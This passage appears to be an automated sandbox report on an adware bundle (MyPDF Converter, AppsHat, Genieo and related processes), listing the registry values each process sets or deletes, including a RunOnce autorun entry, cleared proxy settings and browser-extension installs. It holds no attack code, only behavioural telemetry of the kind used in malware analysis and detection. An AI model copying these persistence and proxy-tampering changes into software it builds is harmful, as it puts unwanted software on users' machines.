[HKLM\SOFTWARE\CUSTPDF Writer\CPWPU899:]
"Destination Folder" = "%Program Files% (x86)\MyPDFConverter"

[HKLM\SOFTWARE\CUSTPDF Writer]
"Port Name" = "CPWPU899:"
"Destination Folder" = "%Program Files% (x86)\MyPDFConverter"

[HKLM\SOFTWARE\CUSTPDF Writer\CPWPU899:]
"Converter" = "%Program Files% (x86)\MyPDFConverter\GNUGS"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPDF Converter]
"DisplayName" = "MyPDF Converter"

[HKLM\SOFTWARE\CUSTPDF Writer]
"Printer Name" = "MyPDF Converter"
"Programmatic Access" = "0"

[HKCU\Printers\DevModes2]
"MyPDF Converter" = "4D 00 79 00 50 00 44 00 46 00 20 00 43 00 6F 00"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\CUSTPDF Writer]
"Arguments"
"Port Name"
"Destination Folder"
"Command"
"Printer Name"
"Programmatic Access"

The process TPAutoConnSvc.exe:1844 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\ThinPrint\TPPrnUI\HP LaserJet Professional M1212nf MFP#:3]
"TrayData" = "2,Tray 3, 3,Tray 2, 1,Tray 1, 4,Manual Feed, 7,Auto Select"
"FormData" = "1,2159,2794,Letter¶40,40,2086,2712, 5,2159,3556,Legal¶40,40,2086,3474, 9,2100,2970,A4¶39,39,2032,2890, 7,1842,2667,Executive¶40,40,1761,2585, 258,2159,3302,8.5 x 13 (custom)¶40,40,2086,3220, 11,1480,2100,A5¶39,39,1408,2020, 70,1050,1480,A6¶39,39,975,1399, 13,1820,2570,B5 (JIS)¶39,39,1747,2490, 264,1950,2700,16K 195x270¶39,39,1882,2620, 263,1840,2600,16K 184x260¶39,39,1761,2520, 257,1970,2730,16K 197x273¶39,39,1896,2650, 43,1000,1480,Japanese Postcard¶39,39,921,1399, 82,1480,2000,Double Japan Postcard Rotated¶39,39,1408,1919, 20,1046,2413,Envelope #10¶40,40,975,2331, 37,983,1905,Envelope Monarch¶40,40,907,1823, 34,1760,2500,Envelope B5¶39,39,1693,2420, 28,1620,2290,Envelope C5¶39,39,1544,2209, 27,1100,2200,Envelope DL¶39,39,1029,2120"
"DelAfterCreate" = "1"

[HKU\.DEFAULT\Printers\DevModes2]
"HP LaserJet Professional M1212nf MFP#:3" = "48 00 50 00 20 00 4C 00 61 00 73 00 65 00 72 00"

The Application deletes the following registry key(s):

[HKLM\SOFTWARE\ThinPrint\TPPrnUI\HP LaserJet Professional M1212nf MFP#:3]

The process appshat.exe:4072 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286]
"65743" = "Apps Hat 1.5"

[HKCU\Software\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "11 F7 16 DC 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKLM\SOFTWARE\InstalledBrowserExtensions\25286]
"65743" = "Apps Hat 1.5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "3B D2 61 E8 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\InstalledBrowserExtensions\25286]
"65743" = "Apps Hat 1.5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process biclient.exe:2452 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1337851866"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3D 95 9D 8F 8E 3B D0 01"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "biclient.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
"WpadDecision" = "0"
"WpadNetworkName" = "Network"
"WpadDecisionTime" = "3D 95 9D 8F 8E 3B D0 01"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
"mypdfconverterfr" = ""

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

The process 11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\App Lid\R25klOVl4E cJzVfU8JcXpd6qA3Rb09kTiS67GUpxImXDvOpaXj6 JR4M30hrCjpoFQ1/cvtFyyoAK0PIvCLgq59mJ8e4oPe9XNYWHfu2xUmUVl/k9u9rZ8FbTNySb2Ei9TamgPzhbT/BvQNp2I6slrPGqRJuy9T4n3csTBG6nk=]
"a5/bwHFtAjucryzHy7MmxBoouBciRo0d82620cT6kn9nKanE7G6eC8XPdvClWFG14Coluj8X8A0Uepue7 4YugA20c3Lq52kHfvucxXEOeLij8Q0klRLNsmol3/DOtNd2dfjAaAz56fNF/7OLH hMcrbtICIAie hX5GdowoLbg=" = "1"

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\Wow6432Node\App Lid\IeHfrFTsSpk9WFTBVM/OjJCXPrm4m6sFugaWEWgKjoT6TUE8xv5h9dl13enbQz7dDSKyXcapJhcROrJjcZbUB VM0qtJWcSmfKHt5IUboACP9IuGX1nuVXn6hHaE4hkxZWGgl82Mnf5z24UN4WeozyvBPQaY4soTNeW4F/9REcA=]
"n8EfoHgcD3cXhpWeFdPjZVARnV8qmJCuYBRONKgg9 8cuJUu6a6yclXEWo5rmaHcdyX7TJ4yQeddyS2LTXrR1eCQtHVAVd7t r2NtJvRtxPWFkhu8 gM3fg47Pro/3YXxOrsQlUlGSMmVfBUkdmJCXi0eEgE1OG5azRyjbuC Ow=" = "1"

The Application deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Tempo]

The process powershell.exe:976 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:1020 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:3596 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"

The process appshat_generic.exe:108 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe"

"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"DisplayName" = "AppsHat Mobile Apps"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"Publisher" = "Somoto Ltd."
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "11 F7 16 DC 8E 3B D0 01"
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "2A 7A C9 E7 8E 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process gentray.exe:2824 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3E 76 5F 11 8F 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 50 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "95 C7 95 33 8F 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process gentray.exe:3260 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "74 FE 43 07 8F 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "10 8B 75 0B 8F 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process gentray.exe:1556 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "FF D6 24 48 8F 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 53 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "06 02 3F 53 8F 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process genieo_setup.gen:3380 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Genieo]
"supported_langs" = ";en;"

[HKCU\Software\Genieo\Components\Partner]
"default_partner_version" = "1.0.400"
"active_partner" = "gim394750002"
"default_partner" = "genieo"
"install_monetizer_url" = ""

[HKCU\Software\Genieo]
"client_localization" = "en"

The process cmdshell.exe:3084 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3B D2 61 E8 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "0F FF FA EB 8E 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process genieo_setup.exe:1552 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Genieo]
"supported_langs" = ";en;"

[HKCU\Software\Genieo\Components\Partner]
"default_partner_version" = "1.0.400"
"active_partner" = "gim394750002"
"default_partner" = "genieo"
"install_monetizer_url" = ""
"installed_partner" = "gim394750002"

[HKCU\Software\Genieo]
"client_localization" = "en"

The process WebPlayer.exe:2984 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\WebPlayer\AppsHat]
"start-on-windows" = "true"
"Version" = "2.13"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\WebPlayer\AppsHat]
"Config" = "{""group-name"":""AppsHat""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\WebPlayer\AppsHat]
"last_config_request" = "Thu Jan 29 08:44:20 UTC 0200 2015"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "1A 3B 37 04 8F 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"

[HKCU\Software\WebPlayer\AppsHat]
"first_run_complete" = "true"
